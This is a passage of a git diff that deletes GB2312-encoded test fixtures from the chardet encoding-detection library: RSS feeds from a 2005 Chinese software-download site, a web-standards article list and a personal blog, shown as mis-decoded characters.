vspace="10">&nbsp;&nbsp;&nbsp;&nbsp;<b>ײקׂ×¹¦ִ:</b><br><ul><li>±¸·µח׳׃׃¼‏ֿֿ¢÷ֱֽ×ֿµָֻ</li><li>±¸·ױ²״¼׀£¬ֽ¼ֶ¬÷ֽ־ִ¼‏</li><li>׳װ¶¯µִ±¸·°²ֵֵ</li><li>׳װ¶¯´´½¨±¸·±אִ¿ֲ¼</li><li>׳װ¶¯»ײ¸´µ½װ­¼µִ־ִ¼‏¼׀</li></ul><p>ײ§³ײµח׳׃׃¼‏£¬ֽ¼ֶ¬£¬÷ֹּֽ־ס‎¾£¬±ד׀¯½¼ֶֻד»ת£¬÷ֹּֽ׃ֳ¼ֶֻד»תֽ¬²½¡£<p>µק¶ָ±ם׳װ¶¯<br>[<a href="http://www.softsea.net/cat/3.htm">ֿµֽ³¹₪¾</a> > <a href="http://www.softsea.net/cat/302.htm">־ִ¼‏¹₪¾</a> > <a href="http://www.softsea.net/cat/30201.htm">־ִ¼‏±¸·</a>] - -http://www.softsea.net/soft/106483.htm -Tue, 20 Dec 2005 16:00:00 GMT - - -ToggleMouse ÷÷»¯²¹¶¡ 4.5.14 -http://www.softsea.net/soft/106194.htm - -<img src="http://www.softsea.net/shot1/106194.gif" align="right" alt="Screenshot" hspace="10" vspace="10">&nbsp;&nbsp;&nbsp;&nbsp;Toggle¹«ֻ¾׳מ׀ֲ·¢²¼µִtoggleMouse4.5.9°ז±¾׃µ׃׀±ָׂװַ° ¸¶אµִ¹¦ִ,׳װ¶¯¹צֱֶ,¶¨ײֶף±ךֲ·ֿ,¿לַֻ׀»»,¹צֲײף±ך,ֱִֶ»»·ֶָ,²¢ײ§³ײׂ¡¸ֻ´ת ּזף±ך,ױג¿ײֲֵַ׃־ֿ·ֳװµִ¸£ׂפ,µָ®ֱשֿמ¹¦ִ.<br>[<a href="http://www.softsea.net/cat/3.htm">ֿµֽ³¹₪¾</a> > <a href="http://www.softsea.net/cat/301.htm">µ׃ֳ¹₪¾</a> > <a href="http://www.softsea.net/cat/30106.htm">ף±ך¼ֵּ</a>] - -http://www.softsea.net/soft/106194.htm -Tue, 20 Dec 2005 16:00:00 GMT - - -UltraISO Media Edition ײ׀־ִ°ז 7.6.5.1250 -http://www.softsea.net/soft/106136.htm - -<img src="http://www.softsea.net/shot1/106136.gif" align="right" alt="Screenshot" hspace="10" vspace="10">&nbsp;&nbsp;&nbsp;&nbsp;ׂ»¸צְאֶֻ׃WinISOµִISO־ִ¼‏±א¼­¹₪¾£¬½חֳז׃ׁ÷ֳ£¬·½±דµִֻ«´°¿²׳ק£¬ִײֶ׳קֶפ¶¯¹גֵּ׃³ֿס¡£ ÷ֽ WinISO ֿא¶װ±ָ£¬¿ִֹײֶ׳קֶפ¶¯¹גֵּ¾µֿסµֱִִ¦ׂ×ַ¿¡£¶רַֽׂר׃ׁ·´׃³־ָ¶¨׀װׂ²÷ֳ׃ WinISO£¡<br>[<a href="http://www.softsea.net/cat/3.htm">ֿµֽ³¹₪¾</a> > <a href="http://www.softsea.net/cat/301.htm">µ׃ֳ¹₪¾</a> > <a href="http://www.softsea.net/cat/30104.htm">¹גַ‎¹₪¾</a>] - -http://www.softsea.net/soft/106136.htm -Tue, 20 Dec 2005 16:00:00 GMT - - -CDCheck ÷÷»¯°ז 3.1.9.0 -http://www.softsea.net/soft/106090.htm - -<img src="http://www.softsea.net/shot1/106090.gif" align="right" alt="Screenshot" hspace="10" vspace="10">&nbsp;&nbsp;&nbsp;&nbsp;CDCheckַׂ»¸צ¿ֹׂװ¼ל²יCDֶ¬¼°ׂ»׀©ֶהֻ±¸·׳°ײֳµִ³ּ׀ע£¬¿ֹׂװ¼ל²י³צִ¿µִCDֶ¬ְןֳזֻשֹױֲ¼µִ־ִ¼‏ַ·סֽךױ¡¢׃׀ֳ»׃׀ֻנ»¡£²¢ַׂ¿ֹׂװ±ָ¶װװ­¼־ִ¼‏ׂװ׳ק½רׂ»²½µִָ·ָֿ¡£³ּ׀ע¹׃ֳ·ַ³£¼עµ¥£¬½«¹גֵֶּ¬·ֵ½ר¹גַ‎ָ»÷ף¿×¼¼ל²י¼´¿ֹ¡£ִת»¹¿ֹׂװ½«¼ל²י÷ףµִ½ב¹´ז³ֹׂ»¸צ־ִ׳ײ־ִ¼‏±¸²י¡£<br>[<a href="http://www.softsea.net/cat/3.htm">ֿµֽ³¹₪¾</a> > <a href="http://www.softsea.net/cat/301.htm">µ׃ֳ¹₪¾</a> > <a href="http://www.softsea.net/cat/30104.htm">¹גַ‎¹₪¾</a>] - -http://www.softsea.net/soft/106090.htm -Tue, 20 Dec 2005 16:00:00 GMT - - -Net ClipShare 1.8.9.5 -http://www.softsea.net/soft/138412.htm - -<img src="http://www.softsea.net/shot1/138412.gif" align="right" alt="Screenshot" hspace="10" vspace="10">&nbsp;&nbsp;&nbsp;&nbsp;¼ֲַ¼ָ«²¿ִדµִ¼פּש°ו»מ¶¯£¬´׃־ִ±¾µ½ֽ¼ֿס£¬ֻש׃׀µִ¼פּשִ¹»±£´זװׂ»¸צ¼פּש¿ג־×ֱֻ¸³µִµִ¹׃ֳ¡£ִדװֽרֲחֹֿ·ײֿם¼פּשִָ¡£¼פּש¿גִ¹»װֽרֲחֹֿ·½±»¼א²ג£¬ׂװ±דִדװֽרֲחֹֿµֱִםׂ»¸צ׃ֳ»§´´װלׂ»¸צ׀ֲµִ¼׀·ײֿם±±»¸זײס£ָם¼‏°ְ¨ֻר¡£׃ֳ»§¿ֹ¶¨ׂוµִָָ¼¡£׃כ MS Office ׃¦׃ֳ³ּ׀ע׀­µק¡£ָם¼‏¹¦<br>[<a href="http://www.softsea.net/cat/3.htm">ֿµֽ³¹₪¾</a> > <a href="http://www.softsea.net/cat/301.htm">µ׃ֳ¹₪¾</a> > <a href="http://www.softsea.net/cat/30102.htm">¼פּש°ו</a>] - -http://www.softsea.net/soft/138412.htm -Mon, 19 Dec 2005 16:00:00 GMT - - -File Listing Maker 1.10 -http://www.softsea.net/soft/137319.htm - -<img src="http://www.softsea.net/shot1/137319.gif" align="right" alt="Screenshot" hspace="10" vspace="10">&nbsp;&nbsp;&nbsp;&nbsp;ִד¿ֹׂװ¹׃ֳFile Listing Makerְ´ײֶ׳קׂפֶµ£¬ֽ¼ֶ¬»עױֶהֻ׳װ´µִ־ִ¼‏ַוµ¥¡£¸ֳָם¼‏»¹¿ֹׂװ±»׃ֳ׃±¸·÷ֽ´זµµ־ִ¼‏׀ֵֿ¢£¬ֽ¨¹‎µח׳׃׃¼‏ּב½»»עױ·¢ֻֽ־ִ¼‏£¬ׂװ¼°±א¼­׳װ´־ִ¼‏¡£<br>[<a href="http://www.softsea.net/cat/3.htm">ֿµֽ³¹₪¾</a> > <a href="http://www.softsea.net/cat/302.htm">־ִ¼‏¹₪¾</a> > <a href="http://www.softsea.net/cat/30215.htm">־ִ¼‏¸ֳ</a>] - -http://www.softsea.net/soft/137319.htm -Mon, 19 Dec 2005 16:00:00 GMT - - -Second Copy 2000 7.0.0.155 Beta -http://www.softsea.net/soft/136747.htm - -<img src="http://www.softsea.net/shot1/136747.gif" align="right" alt="Screenshot" hspace="10" vspace="10">&nbsp;&nbsp;&nbsp;&nbsp;°²׳°־ִ¼‏׀¡,ִ׳װ¶¯¶¨±±¸·־ִ¼‏¼׀µ½ֲ¼­ַ‎¶¯ֶק»עֽרֲח·‏־סֶק. ׂ×׳¢²ב׀ֵֿ¢£¬׃כ־ֱׂ×ֿµ»עµ½http://lys_2000.myrice.com²יׁ¯.<br>[<a href="http://www.softsea.net/cat/3.htm">ֿµֽ³¹₪¾</a> > <a href="http://www.softsea.net/cat/302.htm">־ִ¼‏¹₪¾</a> > <a href="http://www.softsea.net/cat/30214.htm">־ִ¼‏¹ְם</a>] - -http://www.softsea.net/soft/136747.htm -Mon, 19 Dec 2005 16:00:00 GMT - - -Licence Protector 2.4 -http://www.softsea.net/soft/122741.htm - -<img src="http://www.softsea.net/shot1/122741.gif" align="right" alt="Screenshot" hspace="10" vspace="10">&nbsp;&nbsp;&nbsp;&nbsp;ױג¸צ³ּ׀ע´´½¨´ר¶ְּ״µִ¹ז·¶µִ±»¼׃ֳµִ׀ם¿ֹ־ִ¼‏£¬ִ¹»±»¹׃ֳׂ»´־¡£¸´ײֶ·ְײ¹ׂ²±»ײ§³ײ¡£<br>[<a href="http://www.softsea.net/cat/3.htm">ֿµֽ³¹₪¾</a> > <a href="http://www.softsea.net/cat/308.htm">¿×·¢ײֶ׳ק</a> > <a href="http://www.softsea.net/cat/30801.htm">±א³ּ¹₪¾</a>] - -http://www.softsea.net/soft/122741.htm -Mon, 19 Dec 2005 16:00:00 GMT - - -ExamXML 4.10 -http://www.softsea.net/soft/121972.htm - -<img src="http://www.softsea.net/shot1/121972.gif" align="right" alt="Screenshot" hspace="10" vspace="10">&nbsp;&nbsp;&nbsp;&nbsp;ױג¸צ³ּ׀ע±ָ½ֿ XML ־ִ¼‏¡£ּב¹©ָפ¸ֹׁ¡װס׃ֳ׃ָ«ֳזµִ±ָ½ֿ¡£³ּ׀עִ¹»±£´ז²מׂל÷ֽ÷ֿ²¢ XML ־ִ¼‏¡£ֽ»³צֿװ¾µִׁױֹ«±ה»¯ׂװ±דִדִ¹»¿´ִַ¹י½ב׃÷ֽװ×ֻ״±»¼׃£¬׀¸ִ»עױֹ¾³‎ֱֻ¡£<p>ױג¸צ³ּ׀עִ¹»±ָ½ָֿפ¸ֹ־ִ¼‏£¬²»ײ¹ׂ»¶װ¡£־ִ¼‏÷ֽ²מׂלװ׃¾ץµִקְן±»ֿװ¾¡£³ּ׀עײ₪µ XML װ DTD/XML ¼ֶ»®¶װֳזµִ־ִ<br>[<a href="http://www.softsea.net/cat/3.htm">ֿµֽ³¹₪¾</a> > <a href="http://www.softsea.net/cat/302.htm">־ִ¼‏¹₪¾</a> > <a href="http://www.softsea.net/cat/30204.htm">±ָ½ֽֿ¬²½</a>] - -http://www.softsea.net/soft/121972.htm -Mon, 19 Dec 2005 16:00:00 GMT - - -MindSoft Utilities XP 9.06 -http://www.softsea.net/soft/108440.htm - -<img src="http://www.softsea.net/shot1/108440.gif" align="right" alt="Screenshot" hspace="10" vspace="10">&nbsp;&nbsp;&nbsp;&nbsp;·ײ־צ÷ֽ׀ְםִדµִ׃²ֵּ»ײ¸´¶מֽגµִ׃²ֵּ¿ױ¼ה¡£»״±´ם־ף£¬¼׃ִֻדµִ¸צָֻ¼ֶֻד»ת¡£³ּ׀ע°ְ¨ֿף÷¶א÷÷ֳ׃ֳµִ¹₪¾£¬°ְ¨ָֿ½רµִ·´·ײֱׁ£¬ָֿ½רµִ¼׃ֳױ£»DVD-R£¬¿ֹ׀´¹גֵּ´ז´¢ֶק£¬÷ֽ׃²ֵּ׀£¶װ»ת£»ָֿ½רµִµתֶ¬ַו½א¹₪¡£<br>[<a href="http://www.softsea.net/cat/3.htm">ֿµֽ³¹₪¾</a> > <a href="http://www.softsea.net/cat/305.htm">ֿµֽ³¹ְם</a> > <a href="http://www.softsea.net/cat/30502.htm">ױן²ג¹₪¾</a>] - -http://www.softsea.net/soft/108440.htm -Mon, 19 Dec 2005 16:00:00 GMT - - - diff --git a/chardet/tests/GB2312/w3cn.org.xml b/chardet/tests/GB2312/w3cn.org.xml deleted file mode 100644 index 6f0a204..0000000 --- a/chardet/tests/GB2312/w3cn.org.xml +++ /dev/null @@ -1,176 +0,0 @@ - - - - - ֽרׂ³ֹט¼ֶ¦ - ־ִױֲ½ּ³ּ - http://www.w3cn.org - - zh - RSS Generated by ActiveContent 3.5 - - - - °¢÷ך - ָח÷־ׂװ¼°÷־±¹׃ֳsIFR - http://www.w3cn.org/article/translate/2005/117.html - 2005-5-28 16:05:36 - http://www.w3cn.org/article/translate/2005/117.html - - - - °¢½ - HTML4±ךַ©µִִ¬ָֿׁש½ֱ׀±ם - http://www.w3cn.org/article/tips/2005/116.html - 2005-5-25 9:51:45 - http://www.w3cn.org/article/tips/2005/116.html - - - - JunChen - װIEײ׀־×abbr±ךַ©¼׃ׁש½ - http://www.w3cn.org/article/translate/2005/115.html - 2005-5-24 9:56:57 - http://www.w3cn.org/article/translate/2005/115.html - - - - JunChen - altפ׀װ÷ֽtitleפ׀װ - http://www.w3cn.org/article/translate/2005/114.html - 2005-5-23 12:00:35 - http://www.w3cn.org/article/translate/2005/114.html - - - - dodo - ׳ףײ׀׃ׂ3ְ¸²¼¾ײײ׀׳מָֿֿװ¾ײ׀ְ¸ִָµִ·½·¨ - http://www.w3cn.org/article/tips/2005/113.html - 2005-5-17 14:39:50 - http://www.w3cn.org/article/tips/2005/113.html - - - - nobita - CSSײ׀µִ»¬¶¯ֳֵ¼¼ץ - http://www.w3cn.org/article/translate/2005/112.html - 2005-5-8 9:39:31 - http://www.w3cn.org/article/translate/2005/112.html - - - - °¢÷ך - ׃ֳCSS¶¨ׂו±ךּגµִ¼¸¸צµְ‎ - http://www.w3cn.org/article/translate/2005/111.html - 2005-4-21 18:21:15 - http://www.w3cn.org/article/translate/2005/111.html - - - - °¢÷ך - ¶¨ׂו±ךּגµִ׳מ÷ֳ·½·¨ - http://www.w3cn.org/article/translate/2005/110.html - 2005-4-15 20:45:18 - http://www.w3cn.org/article/translate/2005/110.html - - - - °¢½ - ½׳דָֿµַׁ§׃ֳCSS£÷HTML½ב¹¹»¯ - http://www.w3cn.org/article/translate/2005/109.html - 2005-4-15 12:29:43 - http://www.w3cn.org/article/translate/2005/109.html - - - - °¢½ - _blank¿×׀ֲ´°¿²»·÷ֿ±ך׳¼? - http://www.w3cn.org/article/tips/2005/107.html - 2005-4-13 10:05:32 - http://www.w3cn.org/article/tips/2005/107.html - - - - °¢½ - ָח÷־׃ֳCSSײֶ׳ק÷בֿע²ֻµ¥? - http://www.w3cn.org/article/tips/2005/105.html - 2005-4-11 16:54:52 - http://www.w3cn.org/article/tips/2005/105.html - - - - ·­ׂכ£÷°¢½ - CSSµִ®°ֻ°ד¼¼ַֹ - http://www.w3cn.org/article/translate/2005/104.html - 2005-4-10 22:03:25 - http://www.w3cn.org/article/translate/2005/104.html - - - - °¢½ - ³£׃ֳCSSֻץ׀´׃ן·¨׳½ב - http://www.w3cn.org/article/tips/2005/103.html - 2005-4-8 15:28:00 - http://www.w3cn.org/article/tips/2005/103.html - - - - °¢½ - ֽ¬ׂ»¸צׂ³ֳז׃ֳ¶א¸צid׃׀²ֳ´׃°ֿל - http://www.w3cn.org/article/tips/2005/102.html - 2005-4-8 9:51:20 - http://www.w3cn.org/article/tips/2005/102.html - - - - x5 - °יֻז׳ֵWeb±ך׳¼·¢ױ¹ - http://www.w3cn.org/article/translate/2004/101.html - 2004-11-24 10:31:24 - http://www.w3cn.org/article/translate/2004/101.html - - - - allan - ¹׃ֳDIVײ®÷ף,²ֳ´±÷ע¹׃ֳTABLE - http://www.w3cn.org/article/tips/2004/100.html - 2004-11-9 15:47:29 - http://www.w3cn.org/article/tips/2004/100.html - - - - °¢½ - ¾­µהׁש½±ם´ףָײ׀web±ך׳¼׃¦׃ֳ´זװµִ־ּג - http://www.w3cn.org/article/tips/2004/99.html - 2004-11-8 11:36:30 - http://www.w3cn.org/article/tips/2004/99.html - - - - °¢½ - ׃ֳ!important½ג¾צIE÷ֽMozillaµִ²¼¾ײ²מ±נ - http://www.w3cn.org/article/tips/2004/91.html - 2004-7-24 14:56:36 - http://www.w3cn.org/article/tips/2004/91.html - - - - °¢½ - ÷׀ִ£׀ֽbugµִ½ג¾צ·½·¨ - http://www.w3cn.org/article/tips/2004/90.html - 2004-7-22 22:37:07 - http://www.w3cn.org/article/tips/2004/90.html - - - - °¢½ - ±ם¸ס¶װ¾צCSS--ׂ»³¡ֹתְֻײ®ױ½ - http://www.w3cn.org/article/translate/2004/89.html - 2004-7-19 21:00:54 - http://www.w3cn.org/article/translate/2004/89.html - - - - \ No newline at end of file diff --git a/chardet/tests/GB2312/www2.tianyablog.com.xml b/chardet/tests/GB2312/www2.tianyablog.com.xml deleted file mode 100644 index 077e5ca..0000000 --- a/chardet/tests/GB2312/www2.tianyablog.com.xml +++ /dev/null @@ -1,277 +0,0 @@ - - - - - ׳װ׃ֹ׳װװ - http://zhangliang.tianyablog.com/ - אז£¬¾¹ָ»ֿא·ךװױגְן£¬׃׀װµ׃׀װµ¡£ -²¥¿ֽ½ּ׃‎װֻ¶¯ -־ֳִקµִ³וֽ»װְֱׂ­¿ֹֻֿׁ,ױגְַָֻאµִ±¯¾ח¡£ -¶«־ק·½־ֳִק׀טׂ׸¶אµִ½»ֱק£¬ִֿ±±ײ®¼הׂ²׀טׂ׸¶אµִ½»ֱק¡£ -ֳָPODCAST,BLOG÷ֽRSS´ר־ֳַׂ׳ֿע׳װ׃ֹ¡££¨ָֿױגׁש°ֹ£¬׃׀µדֿף¿÷ֵ£¬ׂװ÷ףװ¸ִ°ֹ£© -Podcast Education Movement -Podcast, blog and rss will save human being from another clash of civilazation that humiliates every man on this planet, owing to that Failure in WhiteHouse. Let the free dissemination of intelligence to bridge the gap between East and West, South and North. - - - - <![CDATA[ֻ­ְ´¹״׳¢ֶױֽ¨ָֻ¡°ֻµױז»°¡±µִָ¨ׂז]]> - forme2poopon - 2005-11-12׀ֱֶַש(Saturday)ַח - http://zhangliang.tianyablog.com/blogger/post_show.asp?BlogID=2715&PostID=3181375&idWriter=0&Key=0 - ¿ִִֹ¿ַ°ײ»ִ׃ֹ־ֳַׂ׳װ¼÷³׀µ£ֻµױז»°¶רµ½ֶָ÷¦µִ·חֿױ£¬ױגַװַ¿ָ¨ֳזַ°־¢²»׳דµְµִ¸צָֻ¾«ֹסµִ¹גֳ¢£¬ָחֽ¬וח׀ַצ®±»®¹‎ׂ¹¿ױ£¬µ«ָח¹ֲתּל¶¼ַוח׀ַµִ±÷ע£¬װ²׀±©µִ±©¾‎ׂ²»בֿכֿכ׳װ¼÷µִ׀׀־ס£ -¶רַׂ£¬׀טׂ×׃׀ְָֻ´¼ֲֽ¼ױג¸צ¿¹ױשµֲִµ£¬½«ְ´ׂװ¹ת¼·¨ײ־ײ®¡£׀׀ױ‏ױ±״׀כ׃׀ֻש־·¾ו£¬²ֵ»ב׳נײ״·¨ֲֹ¡£]]> - 2005-11-12 9:50:00(0) - - - - <![CDATA[²©¿ֽ׃כ־ןָ¨¼°ׁװֲ׳װ׃ָֹ¨]]> - forme2poopon - 2005-11-10׀ִֶַֻ(Thursday)ַח - http://zhangliang.tianyablog.com/blogger/post_show.asp?BlogID=2715&PostID=3167502&idWriter=0&Key=0 - £ £ ַ°ױף׳׃blogsphere¹־ֱֻׂ»ױף¹ְ¼׀‎·ח£¬´ף¼ׂ¶¼װ¸ש¾·´ֿעֱ´½׃װ¼ֶֻד¸ק׳װblogµִ¼ײµ£¬־ׂ¿´µ½»¹׃׀÷ֳ¼¸®ֽעְֳµ¶µִ¡£׳ֵµ¼ב¶¨ֱֻ÷¶אָֻֽרֲחֹת´זµִִמֽ·°¡£¬°ְ¨־ׂװִ¡£װײ׀־ִblogִך»בֹֿµִµׂ»³¡ׁ½²ֹֿ£¬ISAACׂ²ּבµ½ֱֻ¸צָֻblogַ·סִ¹»׀´½ר½«ְ´µִ־ןָ¨·¨£¬²»¹‎ַֻ°ׁױג¾ה»°µ±׳קּבֽג»°ׂ»±´ר¹‎µִ£¬¶רַׂׂ²±ם¾³צְ´¶װ´ֻ²»±¨ָ־÷־ֿ£ֽ¡£ַ°¡£¬ISAAC׳װ¼÷µִblogײֱ½ס»¹·גµִֿֿׁׁµµµִִ״£¬׀ׂ¿קֻ»¹ַ׃׀ֶהֻ°²ֹםµִײ°ׂµ£¬·סװע׀ֱ׀ֱ¿א¿א±¸‎װ״£¬¸ױ׃׀ֱֻ׳װ¼÷µִ־ָ¶¨¶ֱױָ÷£¬¾ֽֿף´«ֻµײ׀µִ¹תֳסµ³¾¾¯ּ״־ס³ו½רֳסײקָֻ¿ײק°לµִ±¨ֹחׂ»ׁש£¬ױגׁשµִ°׳ֹ«¿ײ²ְֿײװ»¹װׁ׃׀ר]]> - 2005-11-10 20:42:00(0) - - - - <![CDATA[On Blogsphere Financial Ring 2]]> - forme2poopon - 2005-11-9׀ֶַָ‎(Wednesday)ַח - http://zhangliang.tianyablog.com/blogger/post_show.asp?BlogID=2715&PostID=3157262&idWriter=0&Key=0 - £ £ ׂ»¡¢blogsphere financial ring ÷ֽ´«ֽ³½נָ׀³¡µִַר±נ
    £ £ 
    £ £ ³ֹלµִ½נָ׀³¡׃¦¸ֳַ·¨ײֶ½¡ָ«£¬ִ¹»±£»₪ֽ¶׳ױְׂז£¬¹׳װ´÷ְֿםֵהײֳׂװ´ןµ½ֶֽ¶¯ֹח»בֽש¡°־×׳מ´ף¶א‎ָֻµִ׀ׂ¸£¡±µִ·½ֿעֱ¼׀װ·¢ױ¹¡£µ«ַ²»ִֿׁ¸סµִײ´׀׀·¨ֲֹ±ֳָ»׃׀·¨ֲֹ»¹ׂ×־£ֿױ¡£ױג¾ִַֽ¿ַ°־ׂ¹ת׳±¾׀³¡ֻשֳזֱµִ־ּג£¬ֹז¼°µ½µִ¹ְֱֵׂזֵּ¸ש´ם½£¬·ַׂ»³¯ׂ»ֿ¦ֻשִלמ³‎£¬blogsphere²»׃¦¸ֳָ¥ִַֻּ¸צ»כֻ®£¬ֲµֹֿׂ²ֳ»׃׀ֱִ¦ָ¥ַ‎ײנױג¿י׀³¡¡£
    £ £ 
    £ £ ־ׂ°ׁblogsphere financial ring ¶¨ׂו־×»ֶ½נ±´תµִ½נָ׀³¡£¬²»ׂװ·¨ֲֹ־×װ¼ר£¬¶רַׂװµְµֲ־×װ¼ר£¬½¨ֱ¢װ׀ֵֿ¢µִ¹«¿×׃כ¶א]]>
    - 2005-11-9 20:16:00(0) -
    - - - <![CDATA[ֹ§ֲֳׂזַ°£¬ֶָָֻֻ½µָ]]> - forme2poopon - 2005-11-8׀ֶַ¶‏(Tuesday)ַח - http://zhangliang.tianyablog.com/blogger/post_show.asp?BlogID=2715&PostID=3146338&idWriter=0&Key=0 - ֳסײק²»ִ½ג¾צֶ¶¸»¶װֱ¢µִ־ּג¡£ -±ָ¶¸ַ׳׃±ָ³£ָֻµִײַֹּ¿ִֹ¸³צ100£¬µ«ְַ׃ֳֹּׂµֹח»בµִ½©»¯½ב¹¹÷ֽ׀ֵֿ¢²»¶װ³ֶ£¬¸»¿ֹµ׀¹ת¡£ְָֻא²»ֶ½µָµִ¸שװ´׃כֶהֻµַֻ½׃׀²ֶ²ת²»ָחֻµ־ֳַׂׂ»ײ±·מ׀׀ׂ»ײײ½©»¯µִ·ײֵהּוײֶ¡£־ׂׂ»ײ±ָֿ־׸חֲ׳²¼׃ֳ׀©׀¡ֽזׂג»»׃¡µ°²ָֻµִ²ֶ¸»·ַ³£־³£¬½סּל¿´ְ´£¬׃׀·ׂװְ´׃׀ִִׁש²תֶ·±ָWINDOWS¸¼׃־³£¿]]> - 2005-11-8 17:36:00(0) - - - - <![CDATA[ַ½ּ׃‎²תׂµ»¯ֱֻ½«»µפ½ּ׃‎ֲׂµ£¬»¹ַ½ּ׃‎±״׀כ²תׂµ»¯£¿]]> - forme2poopon - 2005-11-8׀ֶַ¶‏(Tuesday)ַח - http://zhangliang.tianyablog.com/blogger/post_show.asp?BlogID=2715&PostID=3146195&idWriter=0&Key=0 - ־ׂµְִם½ג£÷ -²תׂµ»¯׃¦¸ֳַ׀³¡¾­¼ֳ»¯£¬µ«װµ¼²׳ק¹‎³ּײ׀£¬ׂ»ׁש׳ֱֹֻֿ¹ֱֵ׳±¾»¯µִµְֲ·¡£¹ֱֵ׳±¾µִ±¾ײ¾ַֽµֱָ¡¹«¹²׳װ´£¬ֶֶ»µ׀³¡¾­¼ֳµִ¹«ֶ½׳װ׃ֹµִ¹זװע¡£ֻשׂװ³ֱִ¬µִִַ¿ֳקֻµ¡°²תׂµ»¯־׳ן,¸ד²תׂµ»¯µִָֻ¶¼¶¼׃׀׳ן!¡±־ׂ»ש±¾ֹֽֿ¬ׂג¡£ -װױג¸צײֱש־ָׂ¥²־¼׃ֱֹֻֿ÷£µִ²©¿ִֽך»ב£¬ֲֿ־ח׃׀ׂ»³¡ַ½²½ּ׃‎µִ£¬ֶהײ׀¾ֽ׃׀ׂ»¸צײ׀ׁ§µ״ְםְֿ¦ּב³צְ´£¬ױ‏¸®ֽ¶ֱֻ÷¶אַ®µ½·ַ³£ַ°ׁ״µִ²©¿ֽ½ּ׃‎µ¼שֳֹֿז£¬µ«ַ׃ֹ׃ֿמִ¿ױ׀ֽ¶±ך÷ֽ÷ף׀ר־ָֻ¼א¹£¬·´¶רֳ»׃׀½ּ¦¸צָֻµִ²©¿ֽ׳צµִ÷ֳ£¬±¾ְ´¾ֽ²»¶אµִ¹«¹²׳װ´¾ֽױגׁש±»±הֿאּ°־µפֱֻ£¬ױגׁשµִ±הֿאּ°־ִַ¿ַ°׳מֿׁײ״µִ¶װ¹«¹²׳װ´µִ÷ח־¡£ -¾ֽֿףֹֿ÷£»¹׃׀ׂ»¼ׂ½׀ֵ©ׂµ׀ֵֿ¢µִ¹«ֻ¾www.shagri.com£¬¸דֵ©ׂµµִױױµְְם¹÷ֳִדµִֵ©ׂµ¾ֽ¿ֹׂװֱֻ£¬ֶֻ«ׂ×ֱ¬׀ֵֿ¢»¯ׂ²ׂײוׂ»¸£¬ּלּל¸רױ‏¸®½²¹ֲ£¬°ׁ±¾ְ´¿ֹׂװ׃ֳ׃ֵ©ׂµ»ש´¡½¨ֹטµִ¹«¹²²ֶ¸»£¬ָ«²¿¹אµ½ֱֻֻ½ָֻµִׁ°¡£¹µֳֶהֻׂ»׀©±¾ְ´¼¼ץֶנ¼ׂµִ¹«ֻ¾£¬ײ»ְִּµד£·¹¡£ - -¹µֳ¸ֳ׳צµֲִַיֳ»׃׀׳צ³ֹ£¬»¹ׂ×ֽ‏׀²µ½ײ׀׀¡׳װ׃ֹ¾­¼ֳµִ·¢ױ¹¡£ - -½ּ׃‎ֱל׃עµִָֻ¸´ֳֿק°¡£¬¸דֶנ¸¯°ְ´ֻ­±ָµֳֹֿ£¿ - -װױגׁשµִ¹ֱֲֵ¢¶ֿµִ׀³¡ְןֳז£¬ֻ­ׂ×ַֿכֽ¶׳½ּ׃‎£¬ׂ×ֳ´÷ֳַֻֽ÷ִֿ±¸¯°£¬ֳ»׃׀±נµֲִ·¿ֹׂװ׳¡£׀¡±¾¾­׃×µִָֻ£¬ָח¹װִ³·½ֳז³¢µ½׀©׀³¡µִּנֽ·£¬¹ֱֵ׳±¾ײקׂו¿ֹׂװ²»·ׁ´µ»ׂײ®ֱ¦ְַµפִדµִ׀³¡¡£]]> - 2005-11-8 17:23:00(0) - - - - <![CDATA[On Blogsphere Financial Ring]]> - forme2poopon - 2005-11-8׀ֶַ¶‏(Tuesday)ַח - http://zhangliang.tianyablog.com/blogger/post_show.asp?BlogID=2715&PostID=3142880&idWriter=0&Key=0 - £ £ ױג¸צֹּׂµִ£׀ַֽ½¨ֱ¢װׂ»¸צֹטֿכֳֹֿזµִ£¬¸ֳֹטֿכ¾ַֽ£÷ֽרֲחְ½ח׃׀ֳסײק׃כ׳װ׃ֹ´זװ
    £ £ 
    £ £ µ±¹«ֳס¿ֹׂװְ׃ֳֽרֲחֹת´זµִ±÷ע£¬װ­ָֿׂװ¹«ֳס¾׃׳¡µ״־×ׁ¡ַרֲהµ¹«ֳסָ¨µִ·½½¿ִֹ׀טׂ׸ִ±הׂ»ֱֲֻֿ¡£¾ֽֿף³ֲׂ׳¿ֹׂװֽ¨¹‎ֽרֲחֿעָ«ְ½חִ¼¾ט£¬ַ§ְןײ®ֽגµִ°ֻ·ײױ«ֽר׃ׁ¿ֹׂװָ¥µק²יַי¿צ£¬ָ»÷ףָ«ְ½חµִֽרֳס׃ײ¶װ¸ֲֳ¼‏½ר׀׀±חֲ£¬ֽךָ«´עֱֶֶֻµ״׃עµִֿײֶ¡£µ±HOWARD DEAN׃ֳBLOGױשָ¡ֳסײקµ³ּבֳµִ±÷ע־ׂ»¹¶װ´ֻ±ָ½ֿדֲ¶®£¬ײ»ַ¾ץµֳ÷ֳֶז£¬µ«ַֿײװ½׃´¥ׂ»¶־±¼הׂװ÷ף£¬־ֹׂץײֱ¾ץµֳ־ׂױגֹת׃׀¿ִֹׂ²»בֽ¨¹‎BLOG²־¼׃¾÷ׁ¡¹«ײ°¡£
    £ £ 
    £ £ »״µ½Blogsphere Financial Ringױג]]>
    - 2005-11-8 11:18:00(0) -
